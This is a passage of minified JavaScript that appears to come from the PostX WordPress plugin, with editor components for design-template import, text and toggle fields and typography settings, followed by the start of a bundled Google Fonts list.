l}},e.icon&&(0,o.createElement)("div",{className:"ultp-tag-icon"},a.ZP[e.icon]),e.label)))))}},53956:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{__}=wp.i18n,{useState:a,useEffect:i}=wp.element,n=e=>{const{clientId:t,attributes:l,label:n,name:r}=e.store,[s,p]=a({designList:[],error:!1,reload:!1,reloadId:""}),{designList:c,error:u,reload:d,reloadId:m}=s;i((()=>{(async()=>{const e=r.split("/");wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"design"}}).then((t=>{if(t.success){const l=JSON.parse(t.data);p({...s,designList:l[e[1]]})}}))})()}),[]);const g=e=>{const{replaceBlock:o}=wp.data.dispatch("core/block-editor"),a=["queryNumber","queryNumPosts","queryType","queryTax","queryRelation","queryOrderBy","queryOrder","queryInclude","queryExclude","queryAuthor","queryOffset","metaKey","queryExcludeTerm","queryExcludeAuthor","querySticky","queryUnique","queryPosts","queryCustomPosts"];window.fetch("https://ultp.wpxpo.com/wp-json/restapi/v2/single-design",{method:"POST",body:new URLSearchParams("license="+ultp_data.license+"&design_id="+e)}).then((e=>e.text())).then((e=>{if((e=JSON.parse(e)).success&&e.rawData){const i=wp.blocks.parse(e.rawData);let n=i[0].attributes;for(let e=0;e<a.length;e++)n[a[e]]&&delete n[a[e]];n=Object.assign({},l,n),i[0].attributes=n,p({...s,error:!1,reload:!1,reloadId:""}),o(t,i)}else p({...s,error:!0,reload:!1,reloadId:""})})).catch((e=>{console.error(e)}))};return void 0===c?null:(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-template"},n&&(0,o.createElement)("label",null,n),(0,o.createElement)("div",{className:"ultp-sub-field-template"},c.map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-field-template-item "+(e.pro&&!ultp_data.active?"ultp-field-premium":"")},(0,o.createElement)("img",{loading:"lazy",src:e.image}),e.pro&&!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-field-premium-badge"},__("Premium","ultimate-post")),e.pro&&!ultp_data.active?(0,o.createElement)("div",{className:"ultp-field-premium-lock"},(0,o.createElement)("a",{href:ultp_data.premium_link,target:"_blank",rel:"noreferrer"},__("Go Pro","ultimate-post"))):e.pro&&u?(0,o.createElement)("div",{className:"ultp-field-premium-lock"},(0,o.createElement)("a",{href:ultp_data.premium_link,target:"_blank",rel:"noreferrer"},__("Get License","ultimate-post"))):(0,o.createElement)("div",{className:"ultp-field-premium-lock"},(0,o.createElement)("button",{className:"ultp-popup-btn",onClick:()=>{return t=e.ID,l=e.pro,p({...s,reload:!0,reloadId:t}),void(l?ultp_data.active&&g(t):g(t));var t,l}},__("Import","ultimate-post"),d&&m==e.ID&&(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}))))))))}},34774:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{__}=wp.i18n,{TextControl:a,TextareaControl:i}=wp.components,n=e=>{const{value:t,onChange:l,isTextField:n,attr:r,DC:s=null}=e,{placeholder:p,label:c,help:u,disabled:d=!1}=r,m=e=>{l(e)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-groupbutton"},s&&c&&(0,o.createElement)("div",{className:"ultp-field-label-responsive"},(0,o.createElement)("label",{htmlFor:""},c)),(0,o.createElement)("div",{className:s?"ultp-acf-field"+(n?"":"-textarea"):""},n?(0,o.createElement)(a,{__nextHasNoMarginBottom:!0,value:t,placeholder:p,label:s?"":c,help:u,disabled:d,onChange:e=>m(e)}):(0,o.createElement)(i,{value:t,label:s?"":c,placeholder:p,disabled:d,onChange:e=>m(e)}),s))}},60405:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(83100);const{__}=wp.i18n,{Fragment:n}=wp.element,{ToggleControl:r}=wp.components,s=e=>{const{value:t,label:l,pro:s,help:p,onChange:c,clientId:u,updateChild:d,disabled:m=!1,showDisabledValue:g=!1}=e,y=e=>{m||c(e)};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-toggle"},(0,o.createElement)("div",{className:"ultp-sub-field"},(0,o.createElement)(r,{className:"ultp-field-toggle__element",__nextHasNoMarginBottom:!0,help:p,checked:m?!!g&&t:t,label:l?(0,o.createElement)(n,null,(0,o.createElement)("label",{className:"ultp-field-label"},l),s&&!ultp_data.active?(0,o.createElement)("a",{className:"ultp-field-pro-message-inline",href:(0,i.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post")):""):"",onChange:e=>(e=>{s?ultp_data.active&&y(e):y(e),d&&(0,a.Gu)(u)})(e)})))}},7106:(e,t,l)=>{"use strict";l.d(t,{Z:()=>x});var o=l(67294),a=l(87763),i=l(64766),n=l(20107),r=l(60448),s=l(53049),p=l(83100),c=l(7928),u=l(32030),d=l(56834),m=l(45484);const{__}=wp.i18n,{useState:g,useEffect:y}=wp.element,{Dropdown:b,SelectControl:v,ToolbarButton:h,TabPanel:f}=wp.components,{fontSizes:k}=wp.data.select("core/block-editor").getSettings(),w=({value:e,openGlobalTypo:t,setOpenGlobalTypo:l,globalTypos:a,onChange:n,typoHtml:s})=>(0,o.createElement)("div",{className:"ultp-field-typo-settings ultp-common-popup"},(0,o.createElement)("div",{className:"ultp-field-global-typo ultp-typo-family ultp-typo-family-wrap"},(0,o.createElement)("div",{className:"ultp-typo-family"},(0,o.createElement)("div",{className:"ultp-field-label"},__("Select Global Style","ultimate-post")),(0,o.createElement)("div",{className:"ultp-family-group"},(0,o.createElement)("span",{className:"ultp-family-field-data",onClick:()=>l(!t)},e&&(0,r.nl)(e.presetTypo,"typo")||__("Select Global","ultimate-post"),t?(0,o.createElement)("span",{className:"dashicons dashicons-arrow-up-alt2"}):(0,o.createElement)("span",{className:"dashicons dashicons-arrow-down-alt2"})),(0,o.createElement)("div",{className:"ultp-preset-label-link",onClick:()=>(0,r.je)("typo")},"Customize ",i.ZP?.rightAngle2)),t&&(0,o.createElement)("div",{className:"ultp-family-field"},(0,o.createElement)("div",{className:"ultp-family-list preset-family"},a.map(((e,t)=>!["Body_and_Others_typo","Heading_typo","presetTypoCSS"].includes(e)&&(0,o.createElement)("span",{style:(0,r.xP)(e),key:t,onClick:()=>{l(!1),n((0,r.sR)(e))}},(0,r.nl)(e,"typo")))))))),s()),x=e=>{const{value:t,disableClear:l,label:x,device:T,setDevice:_,onChange:C,presetSetting:E,presetSettingParent:S,isToolbar:P=!1}=e,[L,I]=g({open:!1,text:"",custom:!1}),[B,U]=g(!1),{open:M,text:A,custom:H}=L,N=(0,s.RQ)();__("Normal","ultimate-post"),__("Italic","ultimate-post"),__("Oblique","ultimate-post"),__("Initial","ultimate-post"),__("Inherit","ultimate-post"),__("None","ultimate-post"),__("Inherit","ultimate-post"),__("Underline","ultimate-post"),__("Overline","ultimate-post"),__("Line Through","ultimate-post"),y((()=>{(async()=>{const e=R();let l=!1;(k||[{size:13},{size:16},{size:20}]).forEach((t=>{e==t.size&&(l=!0)})),l||void 0!==t.size||(l=!0),I({...L,custom:l})})()}),[]);const j=e=>{if(e&&e.family&&"none"!=e.family&&(0,r.MR)(e.family)){let t=u.Z.filter((t=>t.n==e.family));return 0==t.length&&(t=m.Z.filter((t=>t.n==e.family))),0==t.length&&(t=N.filter((t=>t.n==e.family))),void 0!==t[0]?(t=t[0].v,t.map((e=>({value:e,label:e})))):[{value:"",label:"- None -"}]}return[{value:"100",label:"100"},{value:"200",label:"200"},{value:"300",label:"300"},{value:"400",label:"400"},{value:"500",label:"500"},{value:"600",label:"600"},{value:"700",label:"700"},{value:"800",label:"800"},{value:"900",label:"900"}]},Z=(e,l,o)=>{if("family"==e){if(l){I({...L,open:!1}),l={[e]:l,type:("google"==o?u.Z:"custom_font"==o?N:m.Z).filter((e=>e.n==l))[0].f};const t=j(l);t[0]&&(l={...l,weight:t[0].value})}}else l="define"==e?{size:Object.assign({},t.size,{[T]:l})}:{[e]:l};C(Object.assign({},t,l))},O=e=>e.filter((e=>A?-1!==e.n.toLowerCase().indexOf(A)?{value:e.n}:void 0:{value:e.n})),R=()=>t?.size?t.size[T]:"",D=()=>(0,o.createElement)("div",{className:"ultp-field-typography"},(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-fontFamily"},(0,o.createElement)("div",{className:"ultp-typo-family ultp-typo-family-wrap"},(0,o.createElement)("div",{className:"ultp-typo-family"},(0,o.createElement)("label",{className:"ultp-field-label"},"Font Family"),(0,o.createElement)("span",{className:"ultp-family-field-data "+(S?"parent-typo":""),onClick:()=>I({...L,open:!M})},t&&(0,r.MR)(t.family)||__("Select Font","ultimate-post"),M?(0,o.createElement)("span",{className:"dashicons dashicons-arrow-up-alt2"}):(0,o.createElement)("span",{className:"dashicons dashicons-arrow-down-alt2"})),M&&(0,o.createElement)("span",{className:"ultp-family-field"},(0,o.createElement)("span",{className:"ultp-family-list"},(0,o.createElement)("input",{type:"text",onChange:e=>{return t=e.target.value,void I({...L,text:t});var t},placeholder:"Search..",value:A}),$.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",{className:"ultp-family-disabled"},"Custom Fonts"),$.map(((e,t)=>(0,o.createElement)("span",{className:"ultp_custom_font_option",key:t,onClick:()=>Z("family",e.n,"custom_font")},e.n," ",!ultp_data.active&&(0,o.createElement)("a",{href:K,target:"blank"},"(PRO)"))))),G.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",{className:"ultp-family-disabled"},"System Fonts"),G.map(((e,t)=>(0,o.createElement)("span",{key:t,onClick:()=>Z("family",e.n,"system")},e.n)))),V?(0,o.createElement)("span",{className:"ultp-family-disabled",style:{color:"red"}},"Google Fonts Disabled"):(0,o.createElement)(o.Fragment,null,q.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("span",{className:"ultp-family-disabled"},"Google Fonts"),q.map(((e,t)=>(0,o.createElement)("span",{key:t,onClick:()=>Z("family",e.n,"google")},e.n)))))))))),!S&&(0,o.createElement)("div",{className:"ultp-typo-option"},H?(0,o.createElement)(c.Z,{min:1,max:300,step:1,unit:["px","em","rem"],responsive:!0,typo:!0,label:__("Size","ultimate-post"),value:t&&t.size,device:T,setDevice:_,onChange:e=>Z("size",e),handleTypoFieldPresetData:r.MR}):(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-field-label-responsive"},(0,o.createElement)("label",null,"Size"),(0,o.createElement)(d.Z,{setDevice:_,device:T})),(0,o.createElement)("div",{className:"ultp-default-font-field"},(k||[{size:13},{size:16},{size:20}]).map(((e,t)=>(0,o.createElement)("span",{key:t,className:"ultp-default-font"+(W==e.size?" active":""),onClick:()=>{Z("define",e.size),I({...L,custom:!1})}},e.size))))),(0,o.createElement)("div",{className:"ultp-typo-custom-setting"+(H?" active":""),onClick:()=>I({...L,custom:!H})},H?i.ZP.link:i.ZP.unlink)),(0,o.createElement)("div",{className:"ultp-typo-container"},(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-weight"},(0,o.createElement)(v,{__nextHasNoMarginBottom:!0,label:__("Weight","ultimate-post"),value:t&&t.weight,options:j(t),onChange:e=>Z("weight",e)})),!S&&(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-height"},(0,o.createElement)(c.Z,{min:1,max:300,step:1,responsive:!0,device:T,setDevice:_,unit:["px","em","rem"],label:__("Height","ultimate-post"),value:t&&t.height,onChange:e=>Z("height",e),handleTypoFieldPresetData:r.MR})),(0,o.createElement)("div",{className:"ultp-typo-section ultp-typo-spacing  "+(S?"preset-active":"")},(0,o.createElement)(c.Z,{min:-10,max:30,responsive:!0,step:.1,unit:["px","em","rem"],device:T,setDevice:_,label:__("Spacing","ultimate-post"),value:t&&t.spacing,onChange:e=>Z("spacing",e),handleTypoFieldPresetData:r.MR}))),(0,o.createElement)("div",{className:"ultp-typo-container ultp-typ-family ultp-typo-spacing-container"},(0,o.createElement)("div",{className:"ultp-typo-container ultp-style-container"},(0,o.createElement)("div",{className:"ultp-transform-style"},(0,o.createElement)("span",{title:"italic",style:{fontStyle:"italic"},className:"italic"==t.style?"active":"",onClick:()=>Z("style","italic"==t.style?"normal":"italic")},"l"),(0,o.createElement)("span",{title:"underline",style:{textDecoration:"underline"},className:"underline"==t.decoration?"active":"",onClick:()=>Z("decoration","underline"==t.decoration?"none":"underline")},"U"),(0,o.createElement)("span",{title:"line-through",style:{textDecoration:"line-through"},className:"line-through"==t.decoration?"active":"",onClick:()=>Z("decoration","line-through"==t.decoration?"none":"line-through")},"U"),(0,o.createElement)("span",{title:"uppercase",style:{textTransform:"uppercase"},className:"uppercase"==z?"active":"",onClick:()=>Z("transform","uppercase"==z?"":"uppercase")},"tt"),(0,o.createElement)("span",{title:"lowercase",style:{textTransform:"lowercase"},className:"lowercase"==z?"active":"",onClick:()=>Z("transform","lowercase"==z?"":"lowercase")},"tt"),(0,o.createElement)("span",{title:"capitalize",style:{textTransform:"capitalize"},className:"capitalize"==z?"active":"",onClick:()=>Z("transform","capitalize"==z?"":"capitalize")},"tt"))))),z=t&&t.transform?t.transform:"",F=!(!t||!t.openTypography),W=R(),V=!(!ultp_data.settings?.hasOwnProperty("disable_google_font")||"yes"!=ultp_data.settings.disable_google_font),G=O(m.Z),q=O(u.Z),$=O(N),K=(0,p.Z)("","customFont",ultp_data.affiliate_id),J=(0,r.RK)();return(0,o.createElement)("div",{className:(0,n.Z)({"ultp-field-typo":!0,"ultp-field-wrap":!P,"ultp-preset-typo":S,"ultp-label-space":x})},(0,o.createElement)("div",{className:"ultp-flex-content"},!P&&x&&(0,o.createElement)("label",null,x),E?D():(0,o.createElement)(b,{contentClassName:(0,n.Z)({"ultp-field-dropdown-content ultp-typography-dropdown-content":!0,"ultp-typography-toolbar":P}),renderToggle:({isOpen:e,onToggle:t})=>P?(0,o.createElement)(h,{className:"ultp-typography-toolbar-btn",label:x||"Typography",onClick:()=>{t(),Z("openTypography",1)}},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/typography.svg"})):(0,o.createElement)("div",{className:"ultp-edit-btn"},(0,o.createElement)("div",{className:"ultp-typo-control"},!l&&F&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{e&&t(),Z("openTypography",0)}},i.ZP?.reset_left_line),(0,o.createElement)("div",{className:(F?"active ":"")+" ultp-icon-style",onClick:()=>{t(),Z("openTypography",1)}},a.Z.typography))),renderContent:()=>(0,o.createElement)(o.Fragment,null,P?(0,o.createElement)(f,{className:"ultp-toolbar-tab",tabs:[{name:"typo",title:x}]},(e=>(0,o.createElement)(w,{value:t,openGlobalTypo:B,setOpenGlobalTypo:U,globalTypos:J,onChange:C,typoHtml:D}))):(0,o.createElement)(w,{value:t,openGlobalTypo:B,setOpenGlobalTypo:U,globalTypos:J,onChange:C,typoHtml:D}))})))}},32030:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o=[{n:"ABeeZee",v:[400,"400i"],f:"sans-serif"},{n:"Abel",v:[400],f:"sans-serif"},{n:"Abhaya Libre",v:[400,500,600,700,800],f:"serif"},{n:"Abril Fatface",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Aclonica",v:[400],f:"sans-serif"},{n:"Acme",v:[400],f:"sans-serif"},{n:"Actor",v:[400],f:"sans-serif"},{n:"Adamina",v:[400],f:"serif"},{n:"Advent Pro",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aguafina Script",v:[400],f:"handwriting"},{n:"Akaya Kanadaka",v:[400],f:"display"},{n:"Akaya Telivigala",v:[400],f:"display"},{n:"Akronim",v:[400],f:"display"},{n:"Akshar",v:["300",400,500,600,700],f:"sans-serif"},{n:"Aladin",v:[400],f:"handwriting"},{n:"Alata",v:[400],f:"sans-serif"},{n:"Alatsi",v:[400],f:"sans-serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aldrich",v:[400],f:"sans-serif"},{n:"Alef",v:[400,700],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alegreya",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Alegreya SC",v:[400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Alegreya Sans",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Alegreya Sans SC",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Aleo",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Alex Brush",v:[400],f:"handwriting"},{n:"Alfa Slab One",v:[400],f:"display"},{n:"Alice",v:[400],f:"serif"},{n:"Alike",v:[400],f:"serif"},{n:"Alike Angular",v:[400],f:"serif"},{n:"Allan",v:[400,700],f:"display"},{n:"Allerta",v:[400],f:"sans-serif"},{n:"Allerta Stencil",v:[400],f:"sans-serif"},{n:"Allison",v:[400],f:"handwriting"},{n:"Allura",v:[400],f:"handwriting"},{n:"Almarai",v:["300",400,700,800],f:"sans-serif"},{n:"Almendra",v:[400,"400i",700,"700i"],f:"serif"},{n:"Almendra Display",v:[400],f:"display"},{n:"Almendra SC",v:[400],f:"serif"},{n:"Alumni Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alumni Sans Inline One",v:[400,"400i"],f:"display"},{n:"Amarante",v:[400],f:"display"},{n:"Amaranth",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Amatic SC",v:[400,700],f:"handwriting"},{n:"Amethysta",v:[400],f:"serif"},{n:"Amiko",v:[400,600,700],f:"sans-serif"},{n:"Amiri",v:[400,"400i",700,"700i"],f:"serif"},{n:"Amita",v:[400,700],f:"handwriting"},{n:"Anaheim",v:[400],f:"sans-serif"},{n:"Andada Pro",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Andika",v:[400],f:"sans-serif"},{n:"Anek Bangla",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Devanagari",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gujarati",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gurmukhi",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Kannada",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Latin",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Malayalam",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Odia",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Tamil",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Telugu",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Angkor",v:[400],f:"display"},{n:"Annie Use Your Telescope",v:[400],f:"handwriting"},{n:"Anonymous Pro",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Antic",v:[400],f:"sans-serif"},{n:"Antic Didone",v:[400],f:"serif"},{n:"Antic Slab",v:[400],f:"serif"},{n:"Anton",v:[400],f:"sans-serif"},{n:"Antonio",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Anybody",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Arapey",v:[400,"400i"],f:"serif"},{n:"Arbutus",v:[400],f:"display"},{n:"Arbutus Slab",v:[400],f:"serif"},{n:"Architects Daughter",v:[400],f:"handwriting"},{n:"Archivo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Archivo Black",v:[400],f:"sans-serif"},{n:"Archivo Narrow",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Are You Serious",v:[400],f:"handwriting"},{n:"Aref Ruqaa",v:[400,700],f:"serif"},{n:"Arimo",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Arizonia",v:[400],f:"handwriting"},{n:"Armata",v:[400],f:"sans-serif"},{n:"Arsenal",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Artifika",v:[400],f:"serif"},{n:"Arvo",v:[400,"400i",700,"700i"],f:"serif"},{n:"Arya",v:[400,700],f:"sans-serif"},{n:"Asap",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Asap Condensed",v:[200,"200i",300,"300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Asar",v:[400],f:"serif"},{n:"Asset",v:[400],f:"display"},{n:"Assistant",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Astloch",v:[400,700],f:"display"},{n:"Asul",v:[400,700],f:"sans-serif"},{n:"Athiti",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Atkinson Hyperlegible",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Atma",v:["300",400,500,600,700],f:"display"},{n:"Atomic Age",v:[400],f:"display"},{n:"Aubrey",v:[400],f:"display"},{n:"Audiowide",v:[400],f:"display"},{n:"Autour One",v:[400],f:"display"},{n:"Average",v:[400],f:"serif"},{n:"Average Sans",v:[400],f:"sans-serif"},{n:"Averia Gruesa Libre",v:[400],f:"display"},{n:"Averia Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Sans Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Serif Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Azeret Mono",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Aboreto",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alkalami",v:[400],f:"serif"},{n:"Alkatra",v:[400,500,600,700],f:"display"},{n:"Alumni Sans Collegiate One",v:[400,"400i"],f:"sans-serif"},{n:"Alumni Sans Pinstripe",v:[400,"400i"],f:"sans-serif"},{n:"Amiri Quran",v:[400],f:"serif"},{n:"Anuphan",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Aoboshi One",v:[400],f:"serif"},{n:"Aref Ruqaa Ink",v:[400,700],f:"serif"},{n:"Arima",v:[100,200,300,400,500,600,700],f:"display"},{n:"B612",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"B612 Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"BIZ UDGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDMincho",v:[400,700],f:"serif"},{n:"BIZ UDPGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDPMincho",v:[400,700],f:"serif"},{n:"Babylonica",v:[400],f:"handwriting"},{n:"Bad Script",v:[400],f:"handwriting"},{n:"Bahiana",v:[400],f:"display"},{n:"Bahianita",v:[400],f:"display"},{n:"Bai Jamjuree",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Bakbak One",v:[400],f:"display"},{n:"Ballet",v:[400],f:"handwriting"},{n:"Baloo 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhai 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaijaan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaina 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Chettan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Da 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Paaji 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tamma 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tammudu 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Thambi 2",v:[400,500,600,700,800],f:"display"},{n:"Balsamiq Sans",v:[400,"400i",700,"700i"],f:"display"},{n:"Balthazar",v:[400],f:"serif"},{n:"Bangers",v:[400],f:"display"},{n:"Barlow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Semi Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barriecito",v:[400],f:"display"},{n:"Barrio",v:[400],f:"display"},{n:"Basic",v:[400],f:"sans-serif"},{n:"Baskervville",v:[400,"400i"],f:"serif"},{n:"Battambang",v:["100","300",400,700,900],f:"display"},{n:"Baumans",v:[400],f:"display"},{n:"Bayon",v:[400],f:"sans-serif"},{n:"Be Vietnam Pro",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Beau Rivage",v:[400],f:"handwriting"},{n:"Bebas Neue",v:[400],f:"sans-serif"},{n:"Belgrano",v:[400],f:"serif"},{n:"Bellefair",v:[400],f:"serif"},{n:"Belleza",v:[400],f:"sans-serif"},{n:"Bellota",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Bellota Text",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"BenchNine",v:["300",400,700],f:"sans-serif"},{n:"Benne",v:[400],f:"serif"},{n:"Bentham",v:[400],f:"serif"},{n:"Berkshire Swash",v:[400],f:"handwriting"},{n:"Besley",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Beth Ellen",v:[400],f:"handwriting"},{n:"Bevan",v:[400,"400i"],f:"display"},{n:"BhuTuka Expanded One",v:[400],f:"display"},{n:"Big Shoulders Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Bigelow Rules",v:[400],f:"display"},{n:"Bigshot One",v:[400],f:"display"},{n:"Bilbo",v:[400],f:"handwriting"},{n:"Bilbo Swash Caps",v:[400],f:"handwriting"},{n:"BioRhyme",v:["200","300",400,700,800],f:"serif"},{n:"BioRhyme Expanded",v:["200","300",400,700,800],f:"serif"},{n:"Birthstone",v:[400],f:"handwriting"},{n:"Birthstone Bounce",v:[400,500],f:"handwriting"},{n:"Biryani",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bitter",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Black And White Picture",v:[400],f:"sans-serif"},{n:"Black Han Sans",v:[400],f:"sans-serif"},{n:"Black Ops One",v:[400],f:"display"},{n:"Blinker",v:["100","200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bodoni Moda",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Bokor",v:[400],f:"display"},{n:"Bona Nova",v:[400,"400i",700],f:"serif"},{n:"Bonbon",v:[400],f:"handwriting"},{n:"Bonheur Royale",v:[400],f:"handwriting"},{n:"Boogaloo",v:[400],f:"display"},{n:"Bowlby One",v:[400],f:"display"},{n:"Bowlby One SC",v:[400],f:"display"},{n:"Brawler",v:[400,700],f:"serif"},{n:"Bree Serif",v:[400],f:"serif"},{n:"Brygada 1918",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Bubblegum Sans",v:[400],f:"display"},{n:"Bubbler One",v:[400],f:"sans-serif"},{n:"Buda",v:["300"],f:"display"},{n:"Buenard",v:[400,700],f:"serif"},{n:"Bungee",v:[400],f:"display"},{n:"Bungee Hairline",v:[400],f:"display"},{n:"Bungee Inline",v:[400],f:"display"},{n:"Bungee Outline",v:[400],f:"display"},{n:"Bungee Shade",v:[400],f:"display"},{n:"Butcherman",v:[400],f:"display"},{n:"Butterfly Kids",v:[400],f:"handwriting"},{n:"Blaka",v:[400],f:"display"},{n:"Blaka Hollow",v:[400],f:"display"},{n:"Blaka Ink",v:[400],f:"display"},{n:"Braah One",v:[400],f:"sans-serif"},{n:"Bruno Ace",v:[400],f:"display"},{n:"Bruno Ace SC",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Cabin",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cabin Condensed",v:[400,500,600,700],f:"sans-serif"},{n:"Cabin Sketch",v:[400,700],f:"display"},{n:"Caesar 